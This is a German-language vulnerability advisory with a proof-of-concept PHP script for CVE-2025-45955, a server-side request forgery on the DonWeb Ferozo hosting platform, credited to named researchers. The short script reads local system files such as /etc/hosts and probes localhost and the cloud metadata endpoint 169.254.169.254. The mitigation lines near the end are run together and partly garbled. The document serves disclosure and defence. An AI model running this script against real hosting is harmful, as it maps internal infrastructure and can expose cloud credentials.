
Proof-of-Concept-Exploit für CVE-2025-45955, der Server-Side Request Forgery (SSRF) auf der DonWeb Ferozo Hosting-Plattform demonstriert und die Kartierung interner Infrastruktur sowie die Aufzählung von Cloud-Metadaten ermöglicht.
Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine speziell präparierte PHP-Datei auf der Ferozo-Hosting-Plattform hochlädt und ausführt. Beim Zugriff startet die Datei eine Reihe von SSRF-Versuchen, die auf interne Dienste (wie 127.0.0.1, 169.254.169.254 oder Service-Mesh-Endpunkte), lokale Dateien (z.B. file:///etc/passwd) und bekannte Cloud-Metadaten-Endpunkte abzielen. Das Skript sammelt Antworten oder Fehlermeldungen, sodass der Angreifer die interne Infrastruktur kartieren, zugängliche Dienste auflisten und vertrauliche Informationen für eine weitere Ausnutzung sammeln kann.
Der folgende Code demonstriert die Schwachstelle:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen usw.)127.0.0.0/8, 169.254.169.254 usw.) durch ausgehende Firewall-RegelnCVE-2025-45955
Gemeldet von [Facundo Fernandez, Jinook Kim, Surendra Puppala / Sicherheitsforscher | @BYU]